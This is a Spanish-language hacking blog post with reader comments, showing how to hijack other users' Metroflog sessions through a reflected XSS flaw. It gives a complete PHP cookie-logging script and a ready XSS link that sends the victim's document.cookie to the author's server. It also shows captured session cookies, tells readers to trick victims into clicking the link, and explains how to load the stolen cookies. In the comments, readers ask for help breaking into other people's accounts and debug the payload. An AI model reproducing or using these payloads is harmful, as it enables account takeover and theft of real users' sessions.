Aztlan Hack I. S. T. - Blog Robo-de-sesiones-en-metroflog

Bienvenido 38.107.191.100

| Iniciar sesion |

Usuarios en linea: 5 visitantes, 0 miembros

« 1 2 3 Hack (Basico) pOr: PiCkSiE

# X.25 Ethical Hacking Conferences 2010 »

Robo de sesiones en metroflog

Calificado 1 veces.

Autor: Molder Fecha:15 Oct 2009

Desde hace tiempo metroflog es vulnerable a XSS pero no se por que los administradores del sitio no hacen nada, aunque gracias a ello podemos seguir aprendiendo XD.

Esta vez toca hacer un robo de sesión de un usuario metroflog, esto quiere decir que podremos ingresar en la sesión de otro usuario siempre y cuando el la mantenga viva.

Como ya muchos saben el error XSS se encuentra en la URL que sale en el momento en que damos clic sobre alguna foto de la barra superior (Esa que se desplaza y enseña mas fotos).

Cuando damos clic aparece una URL similar a esta:

http://www.metroflog.com/dunkel015/20091014/chido?pos=20091014&nf=

la variable hoy vulnerable es nf=

Lo que aremos es iniciar sesión en nuestra cuenta y verificamos que es nuestro nombre de usuario el que aparece:

Ahora para robar la sesión es necesario subir un script para capturar cookies en algún servidor:


<?php

$method = strtolower($_SERVER['REQUEST_METHOD']);

switch($method)

{

case 'get':

$CONTEXT =& $_GET;

break;

case 'post':

$CONTEXT =& $_POST;

break;

default:

$CONTEXT = array();

break;

}

$cookie = isset($CONTEXT["cookie"]) ? $CONTEXT["cookie"] : "";

if(!empty($cookie) )

{

$filename = 'cookies.txt';

$text = time().": $cookie\n\n";

if (file_exists($filename))

{

if (is_writable($filename))

{

$handle = fopen($filename, 'a');

fwrite($handle, $text);

fclose($handle);

}

}

else

{

$handle = fopen($filename,'w+');

fwrite($handle, $text);

}

}

?>

Después mediante alguna técnica de Ing. social hacemos que nuestra victima ingrese en su cuenta y ademas de clic sobre un enlace malicioso:

http://www.metroflog.com/dunkel015/20091014/chido?pos=20091014&nf="><img src='http://www.google.com.mx/intl/es_mx/images/logo.gif' alt='XSS'onload="this.src='http://www.aztlan-hack.org/cookie.php?cookie='%2Bdocument.cookie">

Lo que hace esta URL es inyectar una imagen (logo de google) y cuando se termina de cargar ejecuta un Javascript onload que se encarga de llamar nuestra pagina que captura la cookie ademas de pesarle la variable document.cookie.

Una vez que nuestra victima cae en la trampa revisamos nuestro LOG de cookies generado por el script malicioso y vemos lo que captura:

real_codigopais=136;
__utma=18306213.223340742.1255558717.1255558717.1255623477.2;
__utmz=18306213.1255558717.1.1.utmccn=(organic)|utmcsr=google|utmctr=metroflo|utmcmd=organic;
remember=y; fox_cornetto=s; PHPSESSID=65a08e27af64834892186af59c475879;
__utmb=18306213;
__utmc=18306213;
sid_public=c768.cf40.c768.cf38;
sid_private=14867.15037.13cbd.14876.12929.111c4.10de1.58;
showing_usuario=dunkel015;
showing_rowinfo=a:24:{i:0;s:8:\"30583050\";i:1;s:9:\
"dunkel015\";i:2;s:6:\"333333\
";i:3;s:6:\"99FFCC\";i:4;s:6:\
"FF0033\";i:5;s:6:\"333300\
";i:6;s:6:\"9999CC\";i:7;s:6:\"66CC66\
";i:8;s:1:\"2\";i:9;s:1:\"T\
";i:10;s:1:\"T\";i:11;s:1:\"S\
";i:12;s:5:\"-0500\";i:13;s:2:\"20\
";i:14;s:1:\"M\";i:15;s:1:\"N\
";i:16;s:0:\"\";i:17;s:0:\"\";i:18;s:1:\
"S\";i:19;s:10:\"2009-10-14\";i:20;s:0:\"\
";i:21;s:1:\"1\";i:22;s:1:\"S\";i:23;s:4:\"nada\";}

Ahora editamos la cookie nuestra con cualquier editor sustituyendo todas las variables por las nuevas obtenidas de la victima.

img/blog/robo_sesion_metro/cookieeditor.jpg

Ahora al recargar la pagina nuestra cuenta de usuario en la que estamos es la de la victima.

Bueno ahora solo falta esperar para cuando metroflog arregla esto, Salu2.

12 comentarios [Comenta este articulo]

Compartir |

Comentarios

soeck

Comentario: ola
la neta no entendi pero
kisiera qe me ayudaras a robar un metro
ya qe el wey ya me arobado como 3 flogss
y kisiera qe se lo robes o me podrias ayudar
te dejo mi msn

esbame_1@hotmail.com

Publicado: 08 Nov 2009


	Comentario: Lo siento pero esta es una pagina dedicada a la investigacion, no hacemos nada por los demas tendras que arreglartelas solo, ya hemos puesto toda una explicacion sobre las vulnerabilidades de metroflo
	Publicado: 10 Nov 2009

PiCkSiE

Comentario: hola quiero hackear hotmail me ayudan? :O

Publicado: 17 Nov 2009


	Comentario: Claro k si we, primero envia un correo electronico a molder@aztlan-hack.org con la siguiente informacion. email: Tu correo password: tu password email: El correo de la victima password: [vacio] Y un robot que diseñe le pedira el password directamente a hotmail el cual llegara automaticamente a tu correo.
	Publicado: 18 Nov 2009

idolo

Comentario: oye bro dime donde puedo guardar el archivo
en que web se lo agredecere me envia su respuetas a este imal ricardo__xd@hotmail.com

Ver codigo
imprimir
01.<?php
02.$method = strtolower($_SERVER['REQUEST_METHOD']);
03.switch($method)
04.{
05.case 'get':
06.$CONTEXT =& $_GET;
07.break;
08.case 'post':
09.$CONTEXT =& $_POST;
10.break;
11.default:
12.$CONTEXT = array();
13.break;
14.}
15.$cookie = isset($CONTEXT["cookie"]) ? $CONTEXT["cookie"] : "";
16.if(!empty($cookie) )
17.{
18.$filename = 'cookies.txt';
19.$text = time().": $cookie\n\n";
20.if (file_exists($filename))
21.{
22.if (is_writable($filename))
23.{
24.$handle = fopen($filename, 'a');
25.fwrite($handle, $text);
26.fclose($handle);
27.}
28.}
29.else
30.{
31.$handle = fopen($filename,'w+');
32.fwrite($handle, $text);
33.}
34.}
35.?>

Publicado: 15 Dic 2009

dunkel

Comentario: idolo en un pinche php dentro de tu servidor web

Publicado: 08 Ene 2010

Brandon

Comentario:

Che puedes ver porq ya no funciona?
antes andaba ahora ya no! :S

="><img src='http://www.google.com.mx/intl/es_mx/images/logo.gif' alt='XSS'onload="this.src=

ese codigo sigue funcionando?
espero tu respuesta ^^

Publicado: 12 Ene 2010


	Comentario: Ya probaste separar el alt='XSS' del onload=".... ="><img src='http://www.google.com.mx/intl/es_mx/images/logo.gif' alt='XSS' onload="this.src= salu2
	Publicado: 13 Ene 2010

Brandon

Comentario:

Emm si lo acabo de probar y nada
noo mee llega ya el cookiees.txt
=S algo abra pasado! :S

Publicado: 13 Ene 2010


	Comentario: Ya lo probe y funciona bien, revisa bien tu codigo
	Publicado: 13 Ene 2010

Brandon

Comentario: aahh si funciona! =) mee cree otro cookie.php y cambie la imagen !! jejej!! gracias! un abrazo! qe andes bien ^^

Publicado: 13 Ene 2010

Brandon

Comentario: Che molder! Puedes hacer que funcione este programita? http://www.tumetro.com/bg/metrobooter-programa-para-firmar-automaticamente-metroflogs/#comments

Seria un Exelente Post !! Saluds

Publicado: 15 Ene 2010

Agregar Comentario

« 1 2 3 Hack (Basico) pOr: PiCkSiE

# X.25 Ethical Hacking Conferences 2010 »

BLOG [-]

[12 Ago 2010]
Crackeando WEP con WifiWay y aircrack-ng

[11 Ago 2010]
Encriptar información de formularios con Javascript y PHP

[02 Ago 2010]
Leer y escribir una cadena de caracteres con gets y puts

[02 Ago 2010]
GUARDAR DATOS EN FORMATO EXCEL CON PHP

[02 Ago 2010]
Ver los enlaces restringidos en foros SMF 1.1.5.

Nube de Tags [-]

Síguenos en

08 Sep 2010 Eres el visitante número:35636

Hackers, hacking etico, Seguridad Informatica, cracking, RFI, XSS, SQL Injection, Hack Hotmail, Telefonia Celular, Textos Hack, Programacion, Herramientas hacker

Usuario:
Contraseña:

Usuario:
E-mail: